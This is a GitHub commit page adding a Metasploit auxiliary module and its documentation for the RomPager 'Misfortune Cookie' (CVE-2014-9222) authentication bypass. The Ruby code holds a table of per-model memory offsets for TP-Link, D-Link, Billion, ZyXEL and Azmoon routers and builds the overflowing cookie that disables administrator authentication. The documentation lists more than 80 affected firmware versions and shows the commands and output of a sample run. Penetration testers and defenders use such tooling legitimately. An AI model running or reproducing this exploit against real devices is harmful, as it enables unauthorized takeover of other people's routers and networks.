Skip to content

Commit 24151a9

Browse files
author
Brent Cook
committed
Land rapid7#7753, Add auxiliary RomPager misfortune cookie authentication bypass
2 parents c4f1e0d + 3125dc2 commit 24151a9

File tree

2 files changed

+361
-0
lines changed

2 files changed

+361
-0
lines changed

documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md

Lines changed: 128 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,128 @@
1+
## Vulnerable devices
2+
3+
Following is list of devices and firmware versions with known values used for exploitation
4+
0. Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
5+
1. Billion BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
6+
2. Billion BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
7+
3. Billion BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6
8+
4. Billion BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0
9+
5. Billion BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0
10+
6. Billion BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0
11+
7. Billion BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52
12+
8. Billion BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0
13+
9. Billion BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0
14+
10. Billion BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22
15+
11. D-Link DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL
16+
12. D-Link DSL-2600U - Z1_DSL-2600U
17+
13. D-Link DSL-2600U - Z2_V1.08_ras
18+
14. TP-Link TD-8616 - V2_080513
19+
15. TP-Link TD-8816 - V4_100528_Russia
20+
16. TP-Link TD-8816 - V4_100524
21+
17. TP-Link TD-8816 - V5_100528_Russia
22+
18. TP-Link TD-8816 - V5_100524
23+
19. TP-Link TD-8816 - V5_100903
24+
20. TP-Link TD-8816 - V6_100907
25+
21. TP-Link TD-8816 - V7_111103
26+
22. TP-Link TD-8816 - V7_130204
27+
23. TP-Link TD-8817 - V5_100524
28+
24. TP-Link TD-8817 - V5_100702_TR
29+
25. TP-Link TD-8817 - V5_100903
30+
26. TP-Link TD-8817 - V6_100907
31+
27. TP-Link TD-8817 - V6_101221
32+
28. TP-Link TD-8817 - V7_110826
33+
29. TP-Link TD-8817 - V7_130217
34+
30. TP-Link TD-8817 - V7_120509
35+
31. TP-Link TD-8817 - V8_140311
36+
32. TP-Link TD-8820 - V3_091223
37+
33. TP-Link TD-8840T - V1_080520
38+
34. TP-Link TD-8840T - V2_100525
39+
35. TP-Link TD-8840T - V2_100702_TR
40+
36. TP-Link TD-8840T - V2_090609
41+
37. TP-Link TD-8840T - V3_101208
42+
38. TP-Link TD-8840T - V3_110221
43+
39. TP-Link TD-8840T - V3_120531
44+
40. TP-Link TD-W8101G - V1_090107
45+
41. TP-Link TD-W8101G - V1_090107
46+
42. TP-Link TD-W8101G - V2_100819
47+
43. TP-Link TD-W8101G - V2_101015_TR
48+
44. TP-Link TD-W8101G - V2_101101
49+
45. TP-Link TD-W8101G - V3_110119
50+
46. TP-Link TD-W8101G - V3_120213
51+
47. TP-Link TD-W8101G - V3_120604
52+
48. TP-Link TD-W8151N - V3_120530
53+
49. TP-Link TD-W8901G - V1_080522
54+
50. TP-Link TD-W8901G - V1,2_080522
55+
51. TP-Link TD-W8901G - V2_090113_Turkish
56+
52. TP-Link TD-W8901G - V3_140512
57+
53. TP-Link TD-W8901G - V3_100603
58+
54. TP-Link TD-W8901G - V3_100702_TR
59+
55. TP-Link TD-W8901G - V3_100901
60+
56. TP-Link TD-W8901G - V6_110119
61+
57. TP-Link TD-W8901G - V6_110915
62+
58. TP-Link TD-W8901G - V6_120418
63+
59. TP-Link TD-W8901G - V6_120213
64+
60. TP-Link TD-W8901GB - V3_100727
65+
61. TP-Link TD-W8901GB - V3_100820
66+
62. TP-Link TD-W8901N - V1_111211
67+
63. TP-Link TD-W8951ND - V1_101124,100723,100728
68+
64. TP-Link TD-W8951ND - V1_110907
69+
65. TP-Link TD-W8951ND - V1_111125
70+
66. TP-Link TD-W8951ND - V3.0_110729_FI
71+
67. TP-Link TD-W8951ND - V3_110721
72+
68. TP-Link TD-W8951ND - V3_20110729_FI
73+
69. TP-Link TD-W8951ND - V4_120511
74+
70. TP-Link TD-W8951ND - V4_120607
75+
71. TP-Link TD-W8951ND - V4_120912_FL
76+
72. TP-Link TD-W8961NB - V1_110107
77+
73. TP-Link TD-W8961NB - V1_110519
78+
74. TP-Link TD-W8961NB - V2_120319
79+
75. TP-Link TD-W8961NB - V2_120823
80+
76. TP-Link TD-W8961ND - V1_100722,101122
81+
77. TP-Link TD-W8961ND - V1_101022_TR
82+
78. TP-Link TD-W8961ND - V1_111125
83+
79. TP-Link TD-W8961ND - V2_120427
84+
80. TP-Link TD-W8961ND - V2_120710_UK
85+
81. TP-Link TD-W8961ND - V2_120723_FI
86+
82. TP-Link TD-W8961ND - V3_120524,120808
87+
83. TP-Link TD-W8961ND - V3_120830
88+
84. ZyXEL P-660R-T3 - 3.40(BOQ.0)C0
89+
85. ZyXEL P-660RU-T3 - 3.40(BJR.0)C0
90+
91+
## Verification Steps
92+
93+
1. Start msfconsole
94+
2. Do: ```use auxiliary/admin/http/allegro_rompager_auth_bypass```
95+
3. Do: ```set rhost <ip>```
96+
4. Do: ```set rport <port>```
97+
5. Do: ```run```
98+
6. You should be able to login into the device without authentication
99+
100+
## Scenarios
101+
102+
Example run against TP-Link TD-8817:
103+
```
104+
msf > use auxiliary/admin/http/allegro_rompager_auth_bypass
105+
msf auxiliary(allegro_rompager_auth_bypass) > show options
106+
107+
Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
108+
109+
Name Current Setting Required Description
110+
---- --------------- -------- -----------
111+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
112+
RHOST 192.168.1.1 yes The target address
113+
RPORT 80 yes The target port
114+
SSL false no Negotiate SSL/TLS for outgoing connections
115+
TARGETURI / yes URI to test
116+
VHOST no HTTP server virtual host
117+
118+
119+
msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
120+
rhost => 192.168.1.1
121+
msf auxiliary(allegro_rompager_auth_bypass) > run
122+
123+
[+] Detected device:TP-Link TD-8817
124+
[-] Bad response
125+
[-] Bad response
126+
[+] Good response, please check host, authentication should be disabled
127+
[*] Auxiliary module execution completed
128+
```

modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb

Lines changed: 233 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,233 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Auxiliary
9+
include Msf::Exploit::Remote::HttpClient
10+
include Msf::Auxiliary::Report
11+
12+
def initialize(info = {})
13+
super(update_info(
14+
info,
15+
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
16+
'Description' => %q(
17+
This module exploits HTTP servers that appear to be vulnerable to the
18+
'Misfortune Cookie' vulnerability which affects Allegro Software
19+
Rompager versions before 4.34 and can allow attackers to authenticate
20+
to the HTTP service as an administrator without providing valid
21+
credentials.
22+
),
23+
'Author' => [
24+
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
25+
'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
26+
'Lior Oppenheim' # CVE-2014-9222
27+
],
28+
'References' => [
29+
['CVE', '2014-9222'],
30+
['URL', 'http://mis.fortunecook.ie'],
31+
['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
32+
['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
33+
],
34+
'DisclosureDate' => 'Dec 17 2014',
35+
'License' => MSF_LICENSE
36+
))
37+
38+
register_options(
39+
[
40+
OptString.new('TARGETURI', [true, 'URI to test', '/']),
41+
], Exploit::Remote::HttpClient
42+
)
43+
end
44+
45+
def headers
46+
{
47+
'Referer' => full_uri
48+
}
49+
end
50+
51+
# List of known values and models
52+
def devices_list
53+
{
54+
:'AZ-D140W'=>
55+
{:name=>'Azmoon', :model=>'AZ-D140W', :values=>[
56+
[107367693, 13]
57+
]},
58+
:'BiPAC 5102S'=>
59+
{:name=>'Billion', :model=>'BiPAC 5102S', :values=>[
60+
[107369694, 13]
61+
]},
62+
:'BiPAC 5200'=>
63+
{:name=>'Billion', :model=>'BiPAC 5200', :values=>[
64+
[107369545, 9],
65+
[107371218, 21]
66+
]},
67+
:'BiPAC 5200A'=>
68+
{:name=>'Billion', :model=>'BiPAC 5200A', :values=>[
69+
[107366366, 25],
70+
[107371453, 9]
71+
]},
72+
:'BiPAC 5200GR4'=>
73+
{:name=>'Billion', :model=>'BiPAC 5200GR4', :values=>[
74+
[107367690, 21]
75+
]},
76+
:'BiPAC 5200SRD'=>
77+
{:name=>'Billion', :model=>'BiPAC 5200SRD', :values=>[
78+
[107368270, 1],
79+
[107371378, 3],
80+
[107371218, 13]
81+
]},
82+
:'DSL-2520U'=>
83+
{:name=>'D-Link', :model=>'DSL-2520U', :values=>[
84+
[107368902, 25]
85+
]},
86+
:'DSL-2600U'=>
87+
{:name=>'D-Link', :model=>'DSL-2600U', :values=>[
88+
[107366496, 13],
89+
[107360133, 20]
90+
]},
91+
:'TD-8616'=>
92+
{:name=> 'TP-Link', :model=>'TD-8616', :values=>[
93+
[107371483, 21],
94+
[107369790, 17],
95+
[107371161, 1],
96+
[107371426, 17],
97+
[107370211, 5],
98+
]},
99+
:'TD-8817'=>
100+
{:name=> 'TP-Link', :model=>'TD-8817', :values=>[
101+
[107369790, 17],
102+
[107369788, 1],
103+
[107369522, 25],
104+
[107369316, 21],
105+
[107369321, 9],
106+
[107351277, 20]
107+
]},
108+
:'TD-8820'=>
109+
{:name=>'TP-Link', :model=>'TD-8820', :values=>[
110+
[107369768, 17]
111+
]},
112+
:'TD-8840T'=>
113+
{:name=>'TP-Link', :model=>'TD-8840T', :values=>[
114+
[107369845, 5],
115+
[107369790, 17],
116+
[107369570, 1],
117+
[107369766, 1],
118+
[107369764, 5],
119+
[107369688, 17]
120+
]},
121+
:'TD-W8101G'=>
122+
{:name=>'TP-Link', :model=>'TD-W8101G', :values=>[
123+
[107367772, 37],
124+
[107367808, 21],
125+
[107367751, 21],
126+
[107367749, 13],
127+
[107367765, 25],
128+
[107367052, 25],
129+
[107365835, 1]
130+
]},
131+
:'TD-W8151N'=>
132+
{:name=>'TP-Link', :model=>'TD-W8151N', :values=>[
133+
[107353867, 24]
134+
]},
135+
:'TD-W8901G'=>
136+
{:name=> 'TP-Link', :model=>'TD-W8901G', :values=>[
137+
[107367787, 21],
138+
[107368013, 5],
139+
[107367854, 9],
140+
[107367751, 21],
141+
[107367749, 13],
142+
[107367765, 25],
143+
[107367682, 21],
144+
[107365835, 1],
145+
[107367052, 25]
146+
]},
147+
:'TD-W8901GB'=>
148+
{:name=>'TP-Link', :model=>'TD-W8901GB', :values=>[
149+
[107367756, 13],
150+
[107369393, 21]
151+
]},
152+
:'TD-W8901N'=>
153+
{:name=>'TP-Link', :model=>'TD-W8901N', :values=>[
154+
[107353880, 0]
155+
]},
156+
:'TD-W8951ND'=>
157+
{:name=>'TP-Link', :model=>'TD-W8951ND', :values=>[
158+
[107369839, 25],
159+
[107369876, 13],
160+
[107366743, 21],
161+
[107364759, 25],
162+
[107364759, 13],
163+
[107364760, 21]
164+
]},
165+
:'TD-W8961NB'=>
166+
{:name=>'TP-Link', :model=>'TD-W8961NB', :values=>[
167+
[107369844, 17],
168+
[107367629, 21],
169+
[107366421, 13]
170+
]},
171+
:'TD-W8961ND'=>
172+
{:name=>'TP-Link', :model=>'TD-W8961ND', :values=>[
173+
[107369839, 25],
174+
[107369876, 13],
175+
[107364732, 25],
176+
[107364771, 37],
177+
[107364762, 29],
178+
[107353880, 0],
179+
[107353414, 36]
180+
]},
181+
:'P-660R-T3 v3'=> #This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
182+
{:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
183+
[107369567, 21]
184+
]},
185+
:'P-660RU-T3 v2'=> #Couldn't verify this
186+
{:name=>'ZyXEL', :model=>'P-660R-T3', :values=>[
187+
[107369567, 21]
188+
]},
189+
}
190+
end
191+
192+
193+
def check_response_fingerprint(res, fallback_status)
194+
fp = http_fingerprint(response: res)
195+
vprint_status("Fingerprint: #{fp}")
196+
if /realm="(?<model>.+)"/ =~ fp
197+
return model
198+
end
199+
fallback_status
200+
end
201+
202+
def run
203+
res = send_request_raw(
204+
'uri' => normalize_uri(target_uri.path.to_s),
205+
'method' => 'GET',
206+
)
207+
model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
208+
if model != Exploit::CheckCode::Detected
209+
devices = devices_list[model.to_sym]
210+
if devices != nil
211+
print_good("Detected device:#{devices[:name]} #{devices[:model]}")
212+
devices[:values].each { |value|
213+
cookie = "C#{value[0]}=#{'B'*value[1]}\x00"
214+
res = send_request_raw(
215+
'uri' => normalize_uri(target_uri.path.to_s),
216+
'method' => 'GET',
217+
'headers' => headers.merge('Cookie' => cookie)
218+
)
219+
if res != nil and res.code <= 302
220+
print_good('Good response, please check host, authentication should be disabled')
221+
break
222+
else
223+
print_error('Bad response')
224+
end
225+
}
226+
else
227+
print_error("No matching values for fingerprint #{model}")
228+
end
229+
else
230+
print_error('Unknown device')
231+
end
232+
end
233+
end

0 commit comments

Comments
 (0)